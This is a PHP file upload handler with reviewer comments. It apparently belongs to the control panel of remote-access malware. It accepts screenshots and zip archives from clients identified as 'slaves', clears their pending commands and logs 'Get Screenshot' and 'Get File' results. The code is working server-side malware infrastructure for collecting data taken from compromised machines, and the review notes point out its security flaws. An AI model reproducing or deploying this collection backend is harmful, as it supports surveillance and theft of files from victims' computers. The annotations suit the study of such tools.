<?php
// Upload endpoint: accepts one multipart file in the "file" field and stores it under
// $uploads_dir, then records the result in the `slaves` and `logs` tables.
// The client id is taken from the uploaded filename: everything before the first '_'.
// Only ".png" (screenshot) and ".zip" (file) names below 50 MiB are accepted.
//
// NOTE(review): no authentication or session check is visible in this file. Unless
// conn.php enforces one, the id written to the database is whatever the uploader put in
// the filename, so rows in `slaves`/`logs` and the files in ./files should be treated as
// untrusted when this data is examined.
// NOTE(review): the file type is decided from the client-supplied name only; the content
// is never inspected, so a stored ".png"/".zip" is not guaranteed to be one.
// NOTE(review): return values of prepare()/execute() are never checked, and $addFilePath
// is never closed.

// Presumably defines $conn (used below with prepare()/bind_param()) - confirm in conn.php.
include 'conn.php';
// Relative path; resolved against the working directory of the request.
$uploads_dir = './files';
// Placeholder value; overwritten with the client filename below and not otherwise used here.
$name = uniqid();
// Proceed only when a "file" part is present and PHP reports a clean upload.
// When this fails the script ends without output (the outer if has no else).
if (isset($_FILES["file"]["name"]) && $_FILES["file"]["error"] == UPLOAD_ERR_OK)
{
$tmp_name = $_FILES["file"]["tmp_name"];
// Client-controlled original filename.
$name = $_FILES["file"]["name"];
// Screenshot branch: exact, case-sensitive "png" extension and size below 52428800 bytes.
if(pathinfo($name,PATHINFO_EXTENSION) == "png" && $_FILES["file"]["size"] < 52428800)
{
// strpos() returns 0 for a leading '_' and false when there is none; both are falsy,
// so names without an underscore or starting with one are rejected.
if(strpos($name, '_'))
{
// $parsedName[0] is the text before the first '_' and is used as slaveId below.
$parsedName = explode("_", $name);
// '[' and ']' act as the regex delimiters here, so the pattern is \W:
// the id is accepted only if it contains no non-word character.
if(!preg_match("[\W]", $parsedName[0]))
{
// Random component of the stored name: 16 random bytes as hex, passed as the
// prefix to uniqid(), which appends its time-based id.
if (function_exists('openssl_random_pseudo_bytes')){
$nameWithEntropy = uniqid(bin2hex(openssl_random_pseudo_bytes(16)));
}
else{
// Fallback is uniqid() alone, which is derived from the current time and is
// therefore guessable.
$nameWithEntropy = uniqid();
}
// The stored name is built from the validated id, the random part and a fixed
// extension; the rest of the client filename is discarded.
$saveName = $parsedName[0] . "_" . $nameWithEntropy.".png";
$dbImagePathVariable = $uploads_dir . "/" . $saveName;
if(move_uploaded_file($tmp_name, "$uploads_dir/$saveName"))
{
// Success: store the response text and image path, clear the pending command,
// and add a 'Get Screenshot' row to the log table.
$virtualResponse = "Screenshot saved to " . $dbImagePathVariable;
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveLatestImagePath=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("sss",$virtualResponse,$dbImagePathVariable,$parsedName[0]);
$addFilePath->execute();
$insertLog = $conn->prepare("INSERT INTO logs(logDate, logType, logClient, logContent) values(NOW(),'Get Screenshot',?,?)");
$insertLog->bind_param("ss",$parsedName[0],$virtualResponse );
$insertLog->execute();
$insertLog->close();
}
else
{
// Failure: the command is still cleared and no log row is written.
// NOTE(review): slaveLatestImagePath is still set to the path that was not
// written, so the column can point at a file that does not exist.
$virtualResponse = "Operation failed.";
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveLatestImagePath=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("sss",$virtualResponse,$dbImagePathVariable,$parsedName[0]);
$addFilePath->execute();
}
}
else{
// Id contains a non-word character: stop with no output.
die();
}
}
else{
// Filename has no usable '_' separator: stop with no output.
die();
}
}
// File branch: same checks and naming as above, with a ".zip" extension.
elseif(pathinfo($name,PATHINFO_EXTENSION) == "zip" && $_FILES["file"]["size"] < 52428800){ //50 MB max.
// Same falsy-on-0 behaviour as in the png branch.
if(strpos($name, '_'))
{
$parsedName = explode("_", $name);
// Pattern is \W (bracket delimiters); reject ids with any non-word character.
if(!preg_match("[\W]", $parsedName[0]))
{
if (function_exists('openssl_random_pseudo_bytes')){
$nameWithEntropy = uniqid(bin2hex(openssl_random_pseudo_bytes(16)));
}
else{
// Time-derived fallback, as in the png branch.
$nameWithEntropy = uniqid();
}
$saveName = $parsedName[0] . "_" . $nameWithEntropy.".zip";
$dbzipFilePathVariable = $uploads_dir . "/" . $saveName;
if(move_uploaded_file($tmp_name, "$uploads_dir/$saveName"))
{
// Success: store the response text, clear the pending command and add a
// 'Get File' log row. Unlike the png branch, no path column is updated.
$virtualResponse = "Zip file saved to " . $dbzipFilePathVariable;
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?,slaveCommand='' where slaveId=?");
$addFilePath->bind_param("ss",$virtualResponse,$parsedName[0]);
$addFilePath->execute();
$insertLog = $conn->prepare("INSERT INTO logs(logDate, logType, logClient, logContent) values(NOW(),'Get File',?,?)");
$insertLog->bind_param("ss",$parsedName[0],$virtualResponse );
$insertLog->execute();
$insertLog->close();
}
else
{
// Failure: record the failure text and clear the command; no log row is written.
$virtualResponse = "Operation failed.";
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("ss",$virtualResponse,$parsedName[0]);
$addFilePath->execute();
}
}
else{
// Id contains a non-word character: stop with no output.
die();
}
}
else{
// Filename has no usable '_' separator: stop with no output.
die();
}
}
else
{
// Any other extension, or a file of 50 MiB or more: the only path that sends a body.
echo "Fuck off boomer.";
}
}
?>